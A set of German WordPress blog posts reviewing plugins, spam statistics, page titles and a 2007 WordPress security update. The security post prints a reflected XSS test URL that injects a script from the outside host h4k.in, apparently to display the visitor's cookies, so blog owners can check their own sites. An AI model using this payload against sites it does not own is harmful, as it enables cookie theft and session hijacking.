Peruns Weblog - Webwork und Internet

Michael Wöhrer hat in seinem Weblog ein "Plugin-Kaneval" gestartet. Es geht darum, dass die Leute ihre Lieblings- bzw. oft eingesetzte Wordpress-Plugins vorstellen. Allerdings finde ich den Begriff "Karneval", nicht nur hier, sondern auch bei der Veranstaltung mit dem Namen "Blog-Karneval" etwas … wie soll ich es sagen … komisch und befremdlich.

Karneval ist imho entweder z.B. Maskenball (gutes Beispiel ist Venedig) oder "Saufen bis der Arzt kommt" (z.B. große Teile des Straßen-Karnevals in Rheinland): also etwas vorgeben was man nicht ist und/oder sich völlig daneben benehmen. Ich weiß nicht ob der Begriff "Karneval" daher so glücklich gewählt ist. Naja, dass nur am Rande.

Hier meine Auswahl an WP-Plugins:

• Akismet und DB-Backup. Diese beiden Plugins gehören zum UUmfang der Version 2.0.x daher zähle ich die nicht wirklich. Aber ich setze beide intensiv ein.
• Bad Behavior: ein weiteres, hilfreiches Antispam-Werkzeug. Blockt verdächtige "Besucher" schon beim Versuch die Seite zu betreten.
• Comment Quicktags: die Kommentatoren bekommen die Möglichkeit ihr Text mit Hilfe von Quicktags auszuzeichnen bzw. zu formatieren.
• DoFollow: entfernt das nofollow-Attribut aus den Kommentaren. Imho sollte das jeder Blogger einsetzen
• Exec-PHP: dieses Plugin ermöglicht es in Beiträgen und Seiten PHP-Code einzubinden und ausführen zu lassen.
• FeedBurner Replacement: leitet dein Newsfeed auf Feedburner um.
• German Permalinks: wandelt die Umlaute in Permalinks um (ö zu oe). Ich nutze immer noch die alte Version
• Jeromes Keywords: man kann die Beiträge nun auch taggen (Verschlagworten).
• Kommentar-Vorschau (Live): Kommentatoren können, während sie den Kommentar verfassen, sehen wie er später aussehen wird.
• Pagebar: zwischen den einzelnen Seiten blättern.
• Pro-www: viele "Standardistas" bevorzugen die URL-Angabe ohne www (http://domainname.de). Für mich persönlich sehen solche URLs kastriert aus. Ich bevorzuge die Angabe von www. in der URL. Das Plugin erreicht es, dass wenn jemand http://perun.net aufruft auf http://www.perun.net weitergeleitet wird.
• Unfancy Quote: die Anführungszeichen (typografisch richtig: Zollzeichen) werden nicht mehr verschnörkelt sondern normal ausgegeben. Das ist vor allem für Blogger wichtig, die Code-Beispiele schreiben.
• WP-AddQuicktags (de): komfortabel die Quicktags erweitern.

Die Betreiber von Automattic.com beglücken uns - Besitzer von selbst-gehosteten Wordpress-Blogs - mit einer weitere netten Anwendung. Neben Akismet (Anti-Spam) kann man sich nun das Statistik-Plugin holen. Das Plugin wird wie üblich in den Plugin-Ordner hochgeladen, aktiviert und dann muss man in das entsprechende Feld den Wordpress.com-Schlüssel eintragen. Das ist übrigens der gleiche Schlüssel welchen man für Akismet braucht.

Die Statistik eignet sich gut für den schnellen Überblick: Flash-Grafik mit den Überblick der letzten 30 Tage, Top-Refferer, Top-Beiträge nach Aufrufen, die wichtigen Such-Begriffe, welche Links wurden aufgerufen und eine kleine Übersicht. Ist nett und wird alles schnell geladen. Ich teste es momentan in meinem Herr der Ringe-Weblog.

Einziger Haken: minimale Voraussetzung ist Wordpress ab 2.1. Ist das jetzt ein Grund zum Update auf WP 2.1.x? Ein klares "Nö". Das Plugin ist nett und interessant, aber nichts weswegen man sein laufendes System auf den Kopf stellen sollte.

Die neuen Versionen von Wordpress (2.0.10. und 2.1.3) stopfen auch ein paar Sicherheitslücken. Jens hat mich vor ein paar Tagen auf eine Demo aufmerksam gemacht in dem man herausfinden kann ob ein Weblog bedroht ist oder nicht. Einfach an die Domain seines Weblogs folgendes in der Adressleiste dranhängen:

index.php?year=%22%3E%3C/title%3E%3Cscript%20src=
http://h4k.in/j.js%3E%3C/script%3E

und aufrufen. Da die Zeile zu lang ist musste ich sie umbrechen, eigentlich muss alles in eine Zeile. Wenn du dann anstatt deiner Website irgendetwas mit XSS und jede Menge komischer Daten siehst, dann hat dein Weblog eine Lücke. Bei den ausgelesenen Daten handelt sich meiner Meinung nach um die Daten aus dem Cookie.

Wie gesagt, die neuen Versionen stopfen die Lücke und schon seit einiger Zeit konnte man sich die gepatchten Dateien auch einzeln herunterladen. Mich hat es aber gewundert warum bei mir trotz des Patches die Lücke noch vorhanden war. Da die Lücke auf den title-Tag abzielt habe ich daher als erstes das Plugin "Optimal Title" deaktiviert und diese Lücke war nicht mehr vorhanden.

In wie fern es sich hier um eine kritische Sicherheitslücke handelt, dass kann ich nicht sagen. Wer aber auch ohne das o.g. Plugin die Seitentitel so ausgeben möchte das zuerst der Beitragstitel und dann der Name der Website auftaucht - gut für Lesezeichenverwaltung und für die Suchmaschinen - der schaue sich bitte den Beitrag Optimaler Seitentitel in Wordpress und die Kommentare an.

Seit 23. Juni 2006 habe ich Akismet im Einsatz und seit dem wurden durch dieses nützliches Wordpress-Plugin 27 603 Spam-Kommentare und Spam-Trackbacks geblockt. Die Zahl wäre um einiges höher hätte ich nicht vor gut zwei Monaten wieder Bad Behaviour eingeschaltet, der schon im Vorfeld verdächtiges unterbindet. Je nach Aktivität der Spammer sind es üblicherweise 3000-4000 Spamverdächtige Aktivitäten die BB in der Woche blockt.

Ein guter Seitentitel ist sehr wichtig. Ich rede hierbei von dem Titel welcher sich oben in der Browserleiste befindet und durch das title-Element ausgezeichnet wird. Hier eine Abbildung:

Ein Aussagekräftiger Titel ist wichtig für den Besucher und zwar in zweierlei Hinsicht. Zum einen als Orientierung innerhalb der Website und zum anderen wird der Seitentitel bei den diversen Lesezeichen-Verwaltungen auch als Lesezeichen-Titel übernommen. Auch in Bezug auf die Optimierung einer Website für die Suchmaschinen ist der Seitentitel extrem wichtig. Da die Suchmaschinen den Seitentitel stark bewerten und weil bei der Auflistung des Suchergebnisse der Seitentitel benutzt wird. (» Weiterlesen…)

Es gibt eine Neue Version des Smiley-Plugins von Alex King. Diese neue Version soll angeblich unter WP 2.0.x und 2.1 funktionieren, für WP 2.0.x-Linie muss man zusätzlich die prototype.js, welche zum Umfang des Plugins gehört, in den Ordner /wp-includes/js/ hochladen.

Wenn man das Plugin aktiviert dann erscheint die Smiley-Leiste automatisch oberhalb des Kommentar-Formulars und unterhalb der Textbox in der man die Beiträge und Seiten verfasst.

Die Smileyes werden sowohl von dem Code- wie von dem visuellen Editor unterstützt. Ich habe dieses Plugin auf einem Weblog mit WP 2.1 ausprobiert und dort funktioniert es tadellos, hier in diesem Weblog hat es garnicht funktioniert.

Es gibt mal wieder ein neues Spielzeug von del.icio.us: Tagometer Badge. Es handelt sich um ein Stück Javascript welches in eine Website eingebunden werden kann.

Es wird dann angezeigt wie oft die jeweilige URL bei del.icio.us gespeichert wurde und unter welchen Tags (Schlüsselwörtern) die jeweilige Quelle einsortiert wurde.

Im Fall von Weblogs kann man diese Info entweder für die Hauptseite oder für jeden Beitrag einzeln ausgeben. Im Screenshot ist der Tagometer für dieses gesamte Weblog zu sehen bzw. wie viele Nutzer die URL www.perun.net bei del.icio.us gespeichert haben. Und wie das so ist, es gibt natürlich auch schon ein Wordpress-Plugin dafür.

Nachtrag: es ist auch möglich die Tagometer-Funktionalität im Feedburner-Feed einzubinden. Dafür muss man innerhalb des Feedburner-Accounts in Options und dann in FeedFlare die Option "Save to del.icio.us" aktivieren.